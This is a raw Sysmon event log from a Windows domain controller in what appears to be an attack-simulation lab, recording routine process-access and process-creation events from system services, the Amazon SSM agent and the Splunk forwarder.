12:01:04.055{266CAFBE-647D-6064-3100-00000000AE01}2672WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.860{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.857{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.857{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.820{266CAFBE-6481-6064-5900-00000000AE01}4012NT 
AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-6481-6064-5E00-00000000AE01}33044016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.738{266CAFBE-6481-6064-5F00-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 